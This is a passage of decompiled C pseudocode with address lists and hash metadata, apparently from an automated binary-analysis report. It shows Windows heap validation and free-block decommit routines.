                                            							_v20 = _v12 + 0x204;
                                            						}
                                            					}
                                            					_t183 =  &(_t331[0x27]);
                                            					_t281 = 0x81;
                                            					_t326 =  *_t183;
                                            					if(_t183 == _t326) {
                                            						L49:
                                            						_t261 =  &(_t331[0x29]);
                                            						_t184 = 0;
                                            						_t327 =  *_t261;
                                            						_t282 = 0;
                                            						_v24 = 0;
                                            						_v36 = 0;
                                            						__eflags = _t327 - _t261;
                                            						if(_t327 == _t261) {
                                            							L53:
                                            							_t328 = _v32;
                                            							_v28 = _t331;
                                            							__eflags = _t328 - _t184;
                                            							if(_t328 == _t184) {
                                            								__eflags = _t331[0x1d] - _t282;
                                            								if(_t331[0x1d] == _t282) {
                                            									__eflags = _v12;
                                            									if(_v12 == 0) {
                                            										L82:
                                            										_t267 = 1;
                                            										__eflags = 1;
                                            										goto L83;
                                            									}
                                            									_t329 = _t331[0x2f];
                                            									__eflags = _t329;
                                            									if(_t329 == 0) {
                                            										L77:
                                            										_t330 = _t331[0x22];
                                            										__eflags = _t330;
                                            										if(_t330 == 0) {
                                            											L81:
                                            											_t129 =  &_v16;
                                            											 *_t129 = _v16 & 0x00000000;
                                            											__eflags =  *_t129;
                                            											E0101174B( &_v12,  &_v16, 0x8000);
                                            											goto L82;
                                            										}
                                            										_t314 = _t331[0x21] & 0x0000ffff;
                                            										_t285 = 1;
                                            										__eflags = 1 - _t314;
                                            										if(1 >= _t314) {
                                            											goto L81;
                                            										} else {
                                            											goto L79;
                                            										}
                                            										while(1) {
                                            											L79:
                                            											_t330 = _t330 + 0x40;
                                            											_t332 = _t285 & 0x0000ffff;
                                            											_t262 = _v20 + _t332 * 4;
                                            											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                            											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                            												break;
                                            											}
                                            											_t285 = _t285 + 1;
                                            											__eflags = _t285 - _t314;
                                            											if(_t285 < _t314) {
                                            												continue;
                                            											}
                                            											goto L81;
                                            										}
                                            										_t191 =  *[fs:0x30];
                                            										__eflags =  *(_t191 + 0xc);
                                            										if( *(_t191 + 0xc) == 0) {
                                            											_push("HEAP: ");
                                            											E00FEB150();
                                            										} else {
                                            											E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            										}
                                            										_push(_t262);
                                            										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                            										_t148 = _t330 + 0x10; // 0x10
                                            										_push( *((intOrPtr*)(_t330 + 8)));
                                            										E00FEB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                            										L59:
                                            										_t270 = 0;
                                            										__eflags = 0;
                                            										goto L60;
                                            									}
                                            									_t289 = 1;
                                            									__eflags = 1;
                                            									while(1) {
                                            										_t201 = _v12;
                                            										_t329 = _t329 + 0xc;
                                            										_t263 = _t289 & 0x0000ffff;
                                            										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
                                            										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
                                            											break;
                                            										}
                                            										_t289 = _t289 + 1;
                                            										__eflags = _t289 - 0x81;
                                            										if(_t289 < 0x81) {
                                            											continue;
                                            										}
                                            										goto L77;
                                            									}
                                            									_t203 =  *[fs:0x30];
                                            									__eflags =  *(_t203 + 0xc);
                                            									if( *(_t203 + 0xc) == 0) {
                                            										_push("HEAP: ");
                                            										E00FEB150();
                                            									} else {
                                            										E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            									}
                                            									_t291 = _v12;
                                            									_push(_t291 + _t263 * 4);
                                            									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
                                            									_push( *((intOrPtr*)(_t329 + 8)));
                                            									E00FEB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
                                            									goto L59;
                                            								}
                                            								_t212 =  *[fs:0x30];
                                            								__eflags =  *(_t212 + 0xc);
                                            								if( *(_t212 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E00FEB150();
                                            								} else {
                                            									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push(_t331[0x1d]);
                                            								_push(_v36);
                                            								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
                                            								L58:
                                            								E00FEB150();
                                            								goto L59;
                                            							}
                                            							_t220 =  *[fs:0x30];
                                            							__eflags =  *(_t220 + 0xc);
                                            							if( *(_t220 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E00FEB150();
                                            							} else {
                                            								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push(_t328);
                                            							_push(_v24);
                                            							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                            							goto L58;
                                            						} else {
                                            							goto L50;
                                            						}
                                            						while(1) {
                                            							L50:
                                            							_t92 = _t327 - 0x10; // -24
                                            							_t282 = _t331;
                                            							_t230 = E010A4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                            							__eflags = _t230;
                                            							if(_t230 == 0) {
                                            								goto L59;
                                            							}
                                            							_t327 =  *_t327;
                                            							__eflags = _t327 - _t261;
                                            							if(_t327 != _t261) {
                                            								continue;
                                            							}
                                            							_t184 = _v24;
                                            							_t282 = _v36;
                                            							goto L53;
                                            						}
                                            						goto L59;
                                            					} else {
                                            						while(1) {
                                            							_t39 = _t326 + 0x18; // 0x10
                                            							_t264 = _t39;
                                            							if(_t331[0x13] != 0) {
                                            								_t319 = _t331[0x14] ^  *_t264;
                                            								 *_t264 = _t319;
                                            								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                            								_t348 = _t319 >> 0x18 - _t303;
                                            								if(_t319 >> 0x18 != _t303) {
                                            									_push(_t303);
                                            									E0109FA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                            								}
                                            								_t281 = 0x81;
                                            							}
                                            							_t317 = _v20;
                                            							if(_t317 != 0) {
                                            								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                            								_t350 = _t241;
                                            								if(_t350 != 0) {
                                            									if(_t350 >= 0) {
                                            										__eflags = _t241 & 0x00000800;
                                            										if(__eflags == 0) {
                                            											__eflags = _t241 - _t331[0x21];
                                            											if(__eflags < 0) {
                                            												_t298 = _t241;
                                            												_t65 = _t317 + _t298 * 4;
                                            												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                            												__eflags =  *_t65;
                                            											}
                                            										}
                                            									} else {
                                            										_t244 = _t241 & 0x00007fff;
                                            										if(_t244 < _t281) {
                                            											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                            										}
                                            									}
                                            								}
                                            							}
                                            							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E010923E3(_t331, _t264) == 0) {
                                            								break;
                                            							}
                                            							if(_t331[0x13] != 0) {
                                            								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                            								 *_t264 =  *_t264 ^ _t331[0x14];
                                            							}
                                            							_t326 =  *_t326;
                                            							if( &(_t331[0x27]) == _t326) {
                                            								goto L49;
                                            							} else {
                                            								_t281 = 0x81;
                                            								continue;
                                            							}
                                            						}
                                            						__eflags = _t331[0x13];
                                            						if(_t331[0x13] != 0) {
                                            							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                            							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                            						}
                                            						goto L65;
                                            					}
                                            				} else {
                                            					L83:
                                            					return _t267;
                                            				}
                                            			}
                                            0x010a487d
                                            0x010a48f1
                                            0x010a48f3
                                            0x010a48f3
                                            0x00000000
                                            0x010a48f3
                                            0x010a487f
                                            0x010a4885
                                            0x010a4887
                                            0x010a48a8
                                            0x010a48a8
                                            0x010a48ae
                                            0x010a48b0
                                            0x010a48dc
                                            0x010a48dc
                                            0x010a48dc
                                            0x010a48dc
                                            0x010a48ec
                                            0x00000000
                                            0x010a48ec
                                            0x010a48b2
                                            0x010a48bc
                                            0x010a48be
                                            0x010a48c1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010a48c3
                                            0x010a48c3
                                            0x010a48c6
                                            0x010a48c9
                                            0x010a48cc
                                            0x010a48d1
                                            0x010a48d4
                                            0x00000000
                                            0x00000000
                                            0x010a48d6
                                            0x010a48d7
                                            0x010a48da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010a48da
                                            0x010a494f
                                            0x010a4955
                                            0x010a4959
                                            0x010a4978
                                            0x010a497d
                                            0x010a495b
                                            0x010a4970
                                            0x010a4975
                                            0x010a4986
                                            0x010a4987
                                            0x010a498a
                                            0x010a498d
                                            0x010a4997
                                            0x010a47ef
                                            0x010a47ef
                                            0x010a47ef
                                            0x00000000
                                            0x010a47ef
                                            0x010a4890
                                            0x010a4890
                                            0x010a4891
                                            0x010a4891
                                            0x010a4894
                                            0x010a4897
                                            0x010a489d
                                            0x010a48a0
                                            0x00000000
                                            0x00000000
                                            0x010a48a2
                                            0x010a48a3
                                            0x010a48a6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010a48a6
                                            0x010a48fb
                                            0x010a4901
                                            0x010a4905
                                            0x010a4924
                                            0x010a4929
                                            0x010a4907
                                            0x010a491c
                                            0x010a4921
                                            0x010a492f
                                            0x010a4935
                                            0x010a4936
                                            0x010a4939
                                            0x010a4942
                                            0x00000000
                                            0x010a4947
                                            0x010a4835
                                            0x010a483b
                                            0x010a483f
                                            0x010a485e
                                            0x010a4863
                                            0x010a4841
                                            0x010a4856
                                            0x010a485b
                                            0x010a4869
                                            0x010a486c
                                            0x010a486f
                                            0x010a47e7
                                            0x010a47e7
                                            0x00000000
                                            0x010a47ec
                                            0x010a47aa
                                            0x010a47b0
                                            0x010a47b4
                                            0x010a47d3
                                            0x010a47d8
                                            0x010a47b6
                                            0x010a47cb
                                            0x010a47d0
                                            0x010a47de
                                            0x010a47df
                                            0x010a47e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x010a476f
                                            0x010a476f
                                            0x010a4778
                                            0x010a4785
                                            0x010a4787
                                            0x010a478c
                                            0x010a478e
                                            0x00000000
                                            0x00000000
                                            0x010a4790
                                            0x010a4792
                                            0x010a4794
                                            0x00000000
                                            0x00000000
                                            0x010a4796
                                            0x010a4799
                                            0x00000000
                                            0x010a4799
                                            0x00000000
                                            0x010a45c3
                                            0x010a45c3
                                            0x010a45c7
                                            0x010a45c7
                                            0x010a45ca
                                            0x010a45cf
                                            0x010a45d3
                                            0x010a45df
                                            0x010a45e4
                                            0x010a45e6
                                            0x010a45e8
                                            0x010a45ed
                                            0x010a45ed
                                            0x010a45f2
                                            0x010a45f2
                                            0x010a45f7
                                            0x010a45fc
                                            0x010a4602
                                            0x010a4606
                                            0x010a4609
                                            0x010a460f
                                            0x010a46de
                                            0x010a46e3
                                            0x010a46e5
                                            0x010a46ec
                                            0x010a46ee
                                            0x010a46f6
                                            0x010a46f6
                                            0x010a46f6
                                            0x010a46f6
                                            0x010a46ec
                                            0x010a4615
                                            0x010a4615
                                            0x010a461d
                                            0x010a462e
                                            0x010a462e
                                            0x010a461d
                                            0x010a460f
                                            0x010a4609
                                            0x010a46fd
                                            0x00000000
                                            0x00000000
                                            0x010a4710
                                            0x010a471a
                                            0x010a4720
                                            0x010a4720
                                            0x010a4722
                                            0x010a472c
                                            0x00000000
                                            0x010a472e
                                            0x010a472e
                                            0x00000000
                                            0x010a472e
                                            0x010a472c
                                            0x010a4738
                                            0x010a473c
                                            0x010a474b
                                            0x010a4751
                                            0x010a4751
                                            0x00000000
                                            0x010a473c
                                            0x010a48f4
                                            0x010a48f4
                                            0x00000000
                                            0x010a48f4

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                            • API String ID: 0-1357697941
                                            • Opcode ID: 10f76983453e78d5c1f0c1500aed9c20940bde863bb374544c74a41d4d5de50f
                                            • Instruction ID: 2430bbcaa3f769abb9ced837e7b7640726d6da3c52c3903d2bd5334e2ec2de55
                                            • Opcode Fuzzy Hash: 10f76983453e78d5c1f0c1500aed9c20940bde863bb374544c74a41d4d5de50f
                                            • Instruction Fuzzy Hash: BFF13439600686DFDB25CFA9C451BAABBF1FF08310F488069E1C6D7681C7B8E945CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 72%
                                            			E0100A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                            				char _v8;
                                            				signed short _v12;
                                            				signed short _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed short _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				unsigned int _v52;
                                            				signed int _v56;
                                            				void* _v60;
                                            				intOrPtr _v64;
                                            				void* _v72;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __ebp;
                                            				unsigned int _t246;
                                            				signed char _t247;
                                            				signed short _t249;
                                            				unsigned int _t256;
                                            				signed int _t262;
                                            				signed int _t265;
                                            				signed int _t266;
                                            				signed int _t267;
                                            				intOrPtr _t270;
                                            				signed int _t280;
                                            				signed int _t286;
                                            				signed int _t289;
                                            				intOrPtr _t290;
                                            				signed int _t291;
                                            				signed int _t317;
                                            				signed short _t320;
                                            				intOrPtr _t327;
                                            				signed int _t339;
                                            				signed int _t344;
                                            				signed int _t347;
                                            				intOrPtr _t348;
                                            				signed int _t350;
                                            				signed int _t352;
                                            				signed int _t353;
                                            				signed int _t356;
                                            				intOrPtr _t357;
                                            				intOrPtr _t366;
                                            				signed int _t367;
                                            				signed int _t370;
                                            				intOrPtr _t371;
                                            				signed int _t372;
                                            				signed int _t394;
                                            				signed short _t402;
                                            				intOrPtr _t404;
                                            				intOrPtr _t415;
                                            				signed int _t430;
                                            				signed int _t433;
                                            				signed int _t437;
                                            				signed int _t445;
                                            				signed short _t446;
                                            				signed short _t449;
                                            				signed short _t452;
                                            				signed int _t455;
                                            				signed int _t460;
                                            				signed short* _t468;
                                            				signed int _t480;
                                            				signed int _t481;
                                            				signed int _t483;
                                            				intOrPtr _t484;
                                            				signed int _t491;
                                            				unsigned int _t506;
                                            				unsigned int _t508;
                                            				signed int _t513;
                                            				signed int _t514;
                                            				signed int _t521;
                                            				signed short* _t533;
                                            				signed int _t541;
                                            				signed int _t543;
                                            				signed int _t546;
                                            				unsigned int _t551;
                                            				signed int _t553;
                                            
                                            				_t450 = __ecx;
                                            				_t553 = __ecx;
                                            				_t539 = __edx;
                                            				_v28 = 0;
                                            				_v40 = 0;
                                            				if(( *(__ecx + 0xcc) ^  *0x10d8a68) != 0) {
                                            					_push(_a4);
                                            					_t513 = __edx;
                                            					L11:
                                            					_t246 = E0100A830(_t450, _t513);
                                            					L7:
                                            					return _t246;
                                            				}
                                            				if(_a8 != 0) {
                                            					__eflags =  *(__edx + 2) & 0x00000008;
                                            					if(( *(__edx + 2) & 0x00000008) != 0) {
                                            						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                            						_t430 = E0100DF24(__edx,  &_v12,  &_v16);
                                            						__eflags = _t430;
                                            						if(_t430 != 0) {
                                            							_t157 = _t553 + 0x234;
                                            							 *_t157 =  *(_t553 + 0x234) - _v16;
                                            							__eflags =  *_t157;
                                            						}
                                            					}
                                            					_t445 = _a4;
                                            					_t514 = _t539;
                                            					_v48 = _t539;
                                            					L14:
                                            					_t247 =  *((intOrPtr*)(_t539 + 6));
                                            					__eflags = _t247;
                                            					if(_t247 == 0) {
                                            						_t541 = _t553;
                                            					} else {
                                            						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                            						__eflags = _t541;
                                            					}
                                            					_t249 = 7 + _t445 * 8 + _t514;
                                            					_v12 = _t249;
                                            					__eflags =  *_t249 - 3;
                                            					if( *_t249 == 3) {
                                            						_v16 = _t514 + _t445 * 8 + 8;
                                            						E00FE9373(_t553, _t514 + _t445 * 8 + 8);
                                            						_t452 = _v16;
                                            						_v28 =  *(_t452 + 0x10);
                                            						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                            						_v36 =  *(_t452 + 0x14);
                                            						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                            						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                            						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                            						_t256 =  *(_t452 + 0x14);
                                            						__eflags = _t256 - 0x7f000;
                                            						if(_t256 >= 0x7f000) {
                                            							_t142 = _t553 + 0x1ec;
                                            							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                            							__eflags =  *_t142;
                                            							_t256 =  *(_t452 + 0x14);
                                            						}
                                            						_t513 = _v48;
                                            						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                            						_a4 = _t445;
                                            						_v40 = 1;
                                            					} else {
                                            						_t27 =  &_v36;
                                            						 *_t27 = _v36 & 0x00000000;
                                            						__eflags =  *_t27;
                                            					}
                                            					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                            					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                            						_v44 = _t513;
                                            						_t262 = E00FEA9EF(_t541, _t513);
                                            						__eflags = _a8;
                                            						_v32 = _t262;
                                            						if(_a8 != 0) {
                                            							__eflags = _t262;
                                            							if(_t262 == 0) {
                                            								goto L19;
                                            							}
                                            						}
                                            						__eflags =  *0x10d8748 - 1;
                                            						if( *0x10d8748 >= 1) {
                                            							__eflags = _t262;
                                            							if(_t262 == 0) {
                                            								_t415 =  *[fs:0x30];
                                            								__eflags =  *(_t415 + 0xc);
                                            								if( *(_t415 + 0xc) == 0) {
                                            									_push("HEAP: ");
                                            									E00FEB150();
                                            								} else {
                                            									E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            								}
                                            								_push("(UCRBlock != NULL)");
                                            								E00FEB150();
                                            								__eflags =  *0x10d7bc8;
                                            								if( *0x10d7bc8 == 0) {
                                            									__eflags = 1;
                                            									E010A2073(_t445, 1, _t541, 1);
                                            								}
                                            								_t513 = _v48;
                                            								_t445 = _a4;
                                            							}
                                            						}
                                            						_t350 = _v40;
                                            						_t480 = _t445 << 3;
                                            						_v20 = _t480;
                                            						_t481 = _t480 + _t513;
                                            						_v24 = _t481;
                                            						__eflags = _t350;
                                            						if(_t350 == 0) {
                                            							_t481 = _t481 + 0xfffffff0;
                                            							__eflags = _t481;
                                            						}
                                            						_t483 = (_t481 & 0xfffff000) - _v44;
                                            						__eflags = _t483;
                                            						_v52 = _t483;
                                            						if(_t483 == 0) {
                                            							__eflags =  *0x10d8748 - 1;
                                            							if( *0x10d8748 < 1) {
                                            								goto L9;
                                            							}
                                            							__eflags = _t350;
                                            							goto L146;
                                            						} else {
                                            							_t352 = E0101174B( &_v44,  &_v52, 0x4000);
                                            							__eflags = _t352;
                                            							if(_t352 < 0) {
                                            								goto L94;
                                            							}
                                            							_t353 = E01007D50();
                                            							_t447 = 0x7ffe0380;
                                            							__eflags = _t353;
                                            							if(_t353 != 0) {
                                            								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t356 = 0x7ffe0380;
                                            							}
                                            							__eflags =  *_t356;
                                            							if( *_t356 != 0) {
                                            								_t357 =  *[fs:0x30];
                                            								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                            								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                            									E010A14FB(_t447, _t553, _v44, _v52, 5);
                                            								}
                                            							}
                                            							_t358 = _v32;
                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                            							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                            							__eflags = _t484 - 0x7f000;
                                            							if(_t484 >= 0x7f000) {
                                            								_t90 = _t553 + 0x1ec;
                                            								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                            								__eflags =  *_t90;
                                            							}
                                            							E00FE9373(_t553, _t358);
                                            							_t486 = _v32;
                                            							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                            							E00FE9819(_t486);
                                            							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                            							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                            							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                            							__eflags = _t366 - 0x7f000;
                                            							if(_t366 >= 0x7f000) {
                                            								_t104 = _t553 + 0x1ec;
                                            								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                            								__eflags =  *_t104;
                                            							}
                                            							__eflags = _v40;
                                            							if(_v40 == 0) {
                                            								_t533 = _v52 + _v44;
                                            								_v32 = _t533;
                                            								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                            								__eflags = _v24 - _v52 + _v44;
                                            								if(_v24 == _v52 + _v44) {
                                            									__eflags =  *(_t553 + 0x4c);
                                            									if( *(_t553 + 0x4c) != 0) {
                                            										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                            										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                            									}
                                            								} else {
                                            									_t449 = 0;
                                            									_t533[3] = 0;
                                            									_t533[1] = 0;
                                            									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                            									_t491 = _t394;
                                            									 *_t533 = _t394;
                                            									__eflags =  *0x10d8748 - 1; // 0x0
                                            									if(__eflags >= 0) {
                                            										__eflags = _t491 - 1;
                                            										if(_t491 <= 1) {
                                            											_t404 =  *[fs:0x30];
                                            											__eflags =  *(_t404 + 0xc);
                                            											if( *(_t404 + 0xc) == 0) {
                                            												_push("HEAP: ");
                                            												E00FEB150();
                                            											} else {
                                            												E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            											}
                                            											_push("((LONG)FreeEntry->Size > 1)");
                                            											E00FEB150();
                                            											_pop(_t491);
                                            											__eflags =  *0x10d7bc8 - _t449; // 0x0
                                            											if(__eflags == 0) {
                                            												__eflags = 0;
                                            												_t491 = 1;
                                            												E010A2073(_t449, 1, _t541, 0);
                                            											}
                                            											_t533 = _v32;
                                            										}
                                            									}
                                            									_t533[1] = _t449;
                                            									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                            									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                            										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                            										_v16 = _t402;
                                            										__eflags = _t402 - 0xfe;
                                            										if(_t402 >= 0xfe) {
                                            											_push(_t491);
                                            											_push(_t449);
                                            											E010AA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                            											_t533 = _v48;
                                            											_t402 = _v32;
                                            										}
                                            										_t449 = _t402;
                                            									}
                                            									_t533[3] = _t449;
                                            									E0100A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                            									_t447 = 0x7ffe0380;
                                            								}
                                            							}
                                            							_t367 = E01007D50();
                                            							__eflags = _t367;
                                            							if(_t367 != 0) {
                                            								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t370 = _t447;
                                            							}
                                            							__eflags =  *_t370;
                                            							if( *_t370 != 0) {
                                            								_t371 =  *[fs:0x30];
                                            								__eflags =  *(_t371 + 0x240) & 1;
                                            								if(( *(_t371 + 0x240) & 1) != 0) {
                                            									__eflags = E01007D50();
                                            									if(__eflags != 0) {
                                            										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            									}
                                            									E010A1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                            								}
                                            							}
                                            							_t372 = E01007D50();
                                            							_t546 = 0x7ffe038a;
                                            							_t446 = 0x230;
                                            							__eflags = _t372;
                                            							if(_t372 != 0) {
                                            								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            							} else {
                                            								_t246 = 0x7ffe038a;
                                            							}
                                            							__eflags =  *_t246;
                                            							if( *_t246 == 0) {
                                            								goto L7;
                                            							} else {
                                            								__eflags = E01007D50();
                                            								if(__eflags != 0) {
                                            									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                            									__eflags = _t546;
                                            								}
                                            								_push( *_t546 & 0x000000ff);
                                            								_push(_v36);
                                            								_push(_v40);
                                            								goto L120;
                                            							}
                                            						}
                                            					} else {
                                            						L19:
                                            						_t31 = _t513 + 0x101f; // 0x101f
                                            						_t455 = _t31 & 0xfffff000;
                                            						_t32 = _t513 + 0x28; // 0x28
                                            						_v44 = _t455;
                                            						__eflags = _t455 - _t32;
                                            						if(_t455 == _t32) {
                                            							_t455 = _t455 + 0x1000;
                                            							_v44 = _t455;
                                            						}
                                            						_t265 = _t445 << 3;
                                            						_v24 = _t265;
                                            						_t266 = _t265 + _t513;
                                            						__eflags = _v40;
                                            						_v20 = _t266;
                                            						if(_v40 == 0) {
                                            							_t266 = _t266 + 0xfffffff0;
                                            							__eflags = _t266;
                                            						}
                                            						_t267 = _t266 & 0xfffff000;
                                            						_v52 = _t267;
                                            						__eflags = _t267 - _t455;
                                            						if(_t267 < _t455) {
                                            							__eflags =  *0x10d8748 - 1; // 0x0
                                            							if(__eflags < 0) {
                                            								L9:
                                            								_t450 = _t553;
                                            								L10:
                                            								_push(_t445);
                                            								goto L11;
                                            							}
                                            							__eflags = _v40;
                                            							L146:
                                            							if(__eflags == 0) {
                                            								goto L9;
                                            							}
                                            							_t270 =  *[fs:0x30];
                                            							__eflags =  *(_t270 + 0xc);
                                            							if( *(_t270 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E00FEB150();
                                            							} else {
                                            								E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push("(!TrailingUCR)");
                                            							E00FEB150();
                                            							__eflags =  *0x10d7bc8;
                                            							if( *0x10d7bc8 == 0) {
                                            								__eflags = 0;
                                            								E010A2073(_t445, 1, _t541, 0);
                                            							}
                                            							L152:
                                            							_t445 = _a4;
                                            							L153:
                                            							_t513 = _v48;
                                            							goto L9;
                                            						}
                                            						_v32 = _t267;
                                            						_t280 = _t267 - _t455;
                                            						_v32 = _v32 - _t455;
                                            						__eflags = _a8;
                                            						_t460 = _v32;
                                            						_v52 = _t460;
                                            						if(_a8 != 0) {
                                            							L27:
                                            							__eflags = _t280;
                                            							if(_t280 == 0) {
                                            								L33:
                                            								_t446 = 0;
                                            								__eflags = _v40;
                                            								if(_v40 == 0) {
                                            									_t468 = _v44 + _v52;
                                            									_v36 = _t468;
                                            									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                            									__eflags = _v20 - _v52 + _v44;
                                            									if(_v20 == _v52 + _v44) {
                                            										__eflags =  *(_t553 + 0x4c);
                                            										if( *(_t553 + 0x4c) != 0) {
                                            											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                            											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                            										}
                                            									} else {
                                            										_t468[3] = 0;
                                            										_t468[1] = 0;
                                            										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                            										_t521 = _t317;
                                            										 *_t468 = _t317;
                                            										__eflags =  *0x10d8748 - 1; // 0x0
                                            										if(__eflags >= 0) {
                                            											__eflags = _t521 - 1;
                                            											if(_t521 <= 1) {
                                            												_t327 =  *[fs:0x30];
                                            												__eflags =  *(_t327 + 0xc);
                                            												if( *(_t327 + 0xc) == 0) {
                                            													_push("HEAP: ");
                                            													E00FEB150();
                                            												} else {
                                            													E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
